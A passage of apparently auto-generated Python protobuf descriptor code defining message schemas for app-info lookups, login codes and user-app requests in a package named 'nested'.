name='qua', full_name='nested.JudgeTimingBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.JudgeTimingBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.JudgeTimingBusiBuff.busiBuff', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.JudgeTimingBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.JudgeTimingBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.JudgeTimingBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.JudgeTimingBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.JudgeTimingBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.JudgeTimingBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.JudgeTimingBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=92,
serialized_end=347,
)
_NESTED_GETAPPINFOBYLINKBUSIBUFF = _descriptor.Descriptor(
name='GetAppInfoByLinkBusiBuff',
full_name='nested.GetAppInfoByLinkBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetAppInfoByLinkBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetAppInfoByLinkBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetAppInfoByLinkBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetAppInfoByLinkBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetAppInfoByLinkBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetAppInfoByLinkBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetAppInfoByLinkBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetAppInfoByLinkBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetAppInfoByLinkBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetAppInfoByLinkBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetAppInfoByLinkBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=350,
serialized_end=589,
)
_NESTED_USEUSERAPP = _descriptor.Descriptor(
name='UseUserApp',
full_name='nested.UseUserApp',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='appId', full_name='nested.UseUserApp.appId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='verType', full_name='nested.UseUserApp.verType', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='source', full_name='nested.UseUserApp.source', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='channelInfo', full_name='nested.UseUserApp.channelInfo', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=591,
serialized_end=693,
)
_NESTED_CHANNELINFO = _descriptor.Descriptor(
name='channelInfo',
full_name='nested.channelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='refer', full_name='nested.channelInfo.refer', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='via', full_name='nested.channelInfo.via', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=695,
serialized_end=736,
)
_NESTED_USEUSERAPPBUSIBUFF = _descriptor.Descriptor(
name='UseUserAppBusiBuff',
full_name='nested.UseUserAppBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.UseUserAppBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.UseUserAppBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.UseUserAppBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.UseUserAppBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.UseUserAppBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.UseUserAppBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.UseUserAppBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.UseUserAppBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.UseUserAppBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.UseUserAppBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.UseUserAppBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=739,
serialized_end=972,
)
_NESTED_GETCODEBUSIBUFF = _descriptor.Descriptor(
name='GetCodeBusiBuff',
full_name='nested.GetCodeBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetCodeBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetCodeBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetCodeBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetCodeBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetCodeBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetCodeBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetCodeBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetCodeBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetCodeBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetCodeBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetCodeBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=975,
serialized_end=1205,
)
_NESTED_GETAPPINFOBYID = _descriptor.Descriptor(
name='GetAppInfoById',
full_name='nested.GetAppInfoById',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='appid', full_name='nested.GetAppInfoById.appid', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='needVersionInfo', full_name='nested.GetAppInfoById.needVersionInfo', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkDevRight', full_name='nested.GetAppInfoById.checkDevRight', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='firstPath', full_name='nested.GetAppInfoById.firstPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='envVersion', full_name='nested.GetAppInfoById.envVersion', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1207,
serialized_end=1325,
)
_NESTED_GETAPPINFOBYIDBUSIBUFF = _descriptor.Descriptor(
name='GetAppInfoByIdBusiBuff',
full_name='nested.GetAppInfoByIdBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetAppInfoByIdBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetAppInfoByIdBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetAppInfoByIdBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetAppInfoByIdBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetAppInfoByIdBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetAppInfoByIdBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetAppInfoByIdBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetAppInfoByIdBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetAppInfoByIdBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetAppInfoByIdBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetAppInfoByIdBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1328,
serialized_end=1565,
)
_NESTED_D = _descriptor.Descriptor(
name='d',
full_name='nested.d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.d.Seq', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='retCode', full_name='nested.d.retCode', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='errMsg', full_name='nested.d.errMsg', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.d.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.d.Extinfo', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1567,
serialized_end=1662,
)
_NESTED_C0011A = _descriptor.Descriptor(
name='C0011a',
full_name='nested.C0011a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='uin', full_name='nested.C0011a.uin', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig', full_name='nested.C0011a.sig', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform', full_name='nested.C0011a.platform', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='nested.C0011a.type', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='appid', full_name='nested.C0011a.appid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='openid', full_name='nested.C0011a.openid', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sessionkey', full_name='nested.C0011a.sessionkey', index=6,
number=7, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.C0011a.Extinfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1665,
serialized_end=1810,
)
_NESTED_Q2B = _descriptor.Descriptor(
name='q2b',
full_name='nested.q2b',
